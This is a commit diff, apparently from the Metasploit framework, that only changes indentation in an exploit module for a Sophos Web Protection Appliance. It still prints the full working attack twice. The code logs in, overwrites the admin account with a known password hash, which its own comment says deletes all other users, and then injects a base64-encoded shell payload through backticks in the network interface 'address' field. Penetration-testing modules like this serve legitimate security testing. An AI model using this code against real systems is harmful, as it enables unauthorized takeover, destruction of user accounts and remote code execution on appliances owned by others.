Avoid changing modules indentation in this pull request

jvazquez-r7 · jvazquez-r7 · commit 3daa1ed4c5cf · 2014-10-07T10:41:25.000-05:00
diff --git a/modules/exploits/linux/http/sophos_wpa_iface_exec.rb b/modules/exploits/linux/http/sophos_wpa_iface_exec.rb
@@ -70,143 +70,143 @@ def initialize(info = {})
   end
 
   def exploit
-    init = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path, 'index.php')
-    })
-
-    if !init or !init.body
-      fail_with("Could not connect to host")
-    end
-
-    print_status("Getting STYLE key...")
-
-    style = ''
-    init.body.each_line do |line|
-      next if line !~ /name="STYLE" value="(.*)"/
-      style = $1
-    end
-
-    if style == ''
-      fail_with("Could not find style key.")
-    end
-
-    post = {
-     'STYLE' => style,
-     'destination' => '',
-     'section' => '',
-     'username' => datastore['USERNAME'],
-     'password' => datastore['PASSWORD']
-    }
-
-    print_status("Authenticating as " + datastore['USERNAME'])
-    login = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path, '/index.php'),
-      'method' => 'POST',
-      'vars_post' => post,
-      'vars_get' => {
-        'c' => 'login',
+      init = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, 'index.php')
+      })
+
+      if !init or !init.body
+        fail_with("Could not connect to host")
+      end
+
+      print_status("Getting STYLE key...")
+
+      style = ''
+      init.body.each_line do |line|
+        next if line !~ /name="STYLE" value="(.*)"/
+        style = $1
+      end
+
+      if style == ''
+        fail_with("Could not find style key.")
+      end
+
+      post = {
+       'STYLE' => style,
+       'destination' => '',
+       'section' => '',
+       'username' => datastore['USERNAME'],
+       'password' => datastore['PASSWORD']
       }
-    })
-
-    if !login or login.code != 200 or login.body !~ /#{datastore['USERNAME']}<\/a>/
-      fail_with("Authentication failed")
-    end
-
-    #I don't know what salt is being used to hash these
-    #passwords (probably in js somewhere), so I have
-    #to use a static one that I saw being POSTed while
-    #exploring, it is 'notpassword'.
-    #
-    #This will actually delete every other user that exists
-    #except for admin, whose password will be changed
-    #
-    #whoops
-    admin_hash = '[{"id": "default_admin", "username": "admin", "name": "Default Administrator"'
-    admin_hash << ', "password": "70ec23d3e019a307081732c0162b2733", "description": "Default '
-    admin_hash << 'Administrator Account", "admin": true, "roles": ["admin"], "reporting_groups"'
-    admin_hash << ': [], "user_id": 0}]'
-
-    post = {
-      'action' => 'save',
-      'STYLE' => style,
-      'username' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['USERNAME'])),
-      'current' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['PASSWORD'])),
-      'new' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['PASSWORD'])),
-      'admins' => admin_hash
-    }
-
-    print_status("Changing old password hash to notpassword")
-    passchange = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path, '/index.php'),
-      'method' => 'POST',
-      'vars_post' => post,
-      'vars_get' => {
-        'c' => 'change_password'
-      }
-    })
-
-    if !passchange or passchange.code != 200
-      fail_with("Couldn't update admin's password")
-    end
-
-    print_status("Logging in as the admin now")
-    init = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path, 'index.php')
-    })
-
-    if !init or init.code != 200
-      fail_with("Couldn't reget index page for admin auth")
-    end
-
-    init.body.each_line do |line|
-      next if line !~ /name="STYLE" value="(.*)"/
-      style = $1
-    end
-
-    post = {
-      'STYLE' => style,
-      'destination' => '',
-      'section' => '',
-      'username' => 'admin',
-      'password' => 'notpassword'
-    }
-
-    login = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path, 'index.php'),
-      'method' =>  'POST',
-      'vars_post' => post,
-      'vars_get' => {
+
+      print_status("Authenticating as " + datastore['USERNAME'])
+      login = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, '/index.php'),
+        'method' => 'POST',
+        'vars_post' => post,
+        'vars_get' => {
           'c' => 'login',
+        }
+      })
+
+      if !login or login.code != 200 or login.body !~ /#{datastore['USERNAME']}<\/a>/
+        fail_with("Authentication failed")
+      end
+
+      #I don't know what salt is being used to hash these
+      #passwords (probably in js somewhere), so I have
+      #to use a static one that I saw being POSTed while
+      #exploring, it is 'notpassword'.
+      #
+      #This will actually delete every other user that exists
+      #except for admin, whose password will be changed
+      #
+      #whoops
+      admin_hash = '[{"id": "default_admin", "username": "admin", "name": "Default Administrator"'
+      admin_hash << ', "password": "70ec23d3e019a307081732c0162b2733", "description": "Default '
+      admin_hash << 'Administrator Account", "admin": true, "roles": ["admin"], "reporting_groups"'
+      admin_hash << ': [], "user_id": 0}]'
+
+      post = {
+        'action' => 'save',
+        'STYLE' => style,
+        'username' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['USERNAME'])),
+        'current' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['PASSWORD'])),
+        'new' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['PASSWORD'])),
+        'admins' => admin_hash
+      }
+
+      print_status("Changing old password hash to notpassword")
+      passchange = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, '/index.php'),
+        'method' => 'POST',
+        'vars_post' => post,
+        'vars_get' => {
+          'c' => 'change_password'
+        }
+      })
+
+      if !passchange or passchange.code != 200
+        fail_with("Couldn't update admin's password")
+      end
+
+      print_status("Logging in as the admin now")
+      init = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, 'index.php')
+      })
+
+      if !init or init.code != 200
+        fail_with("Couldn't reget index page for admin auth")
+      end
+
+      init.body.each_line do |line|
+        next if line !~ /name="STYLE" value="(.*)"/
+        style = $1
+      end
+
+      post = {
+        'STYLE' => style,
+        'destination' => '',
+        'section' => '',
+        'username' => 'admin',
+        'password' => 'notpassword'
       }
-    })
-
-    if !login or login.code != 200 or login.body !~ /admin<\/a>/
-      fail_with("Couldn't login as admin")
-    end
-
-    pay = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded))
-    post = {
-      'STYLE' => style,
-      'dhcp' => 'no',
-      'address' => "192.16`echo #{pay}|base64 --decode|sh`8.1.16",
-      'gateway' => '192.168.1.254',
-      'sb_bridge' => 'explicit',
-      'netmask' => '255.255.255.0',
-      'sb_linktype' => 'auto',
-      'dns' => 'yes',
-      'dns1' => '192.168.1.254',
-      'dns2' => '',
-      'dns3' => ''
-    }
-
-    print_status("Sending payload")
-    send_request_cgi({
-      'uri' => normalize_uri(target_uri.path, 'index.php'),
-      'method' => 'POST',
-      'vars_post' => post,
-      'vars_get' => {
-          'c' => 'netinterface',
+
+      login = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
+        'method' =>  'POST',
+        'vars_post' => post,
+        'vars_get' => {
+            'c' => 'login',
+        }
+      })
+
+      if !login or login.code != 200 or login.body !~ /admin<\/a>/
+        fail_with("Couldn't login as admin")
+      end
+
+      pay = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded))
+      post = {
+        'STYLE' => style,
+        'dhcp' => 'no',
+        'address' => "192.16`echo #{pay}|base64 --decode|sh`8.1.16",
+        'gateway' => '192.168.1.254',
+        'sb_bridge' => 'explicit',
+        'netmask' => '255.255.255.0',
+        'sb_linktype' => 'auto',
+        'dns' => 'yes',
+        'dns1' => '192.168.1.254',
+        'dns2' => '',
+        'dns3' => ''
       }
-    })
+
+      print_status("Sending payload")
+      send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
+        'method' => 'POST',
+        'vars_post' => post,
+        'vars_get' => {
+            'c' => 'netinterface',
+        }
+      })
   end
 end
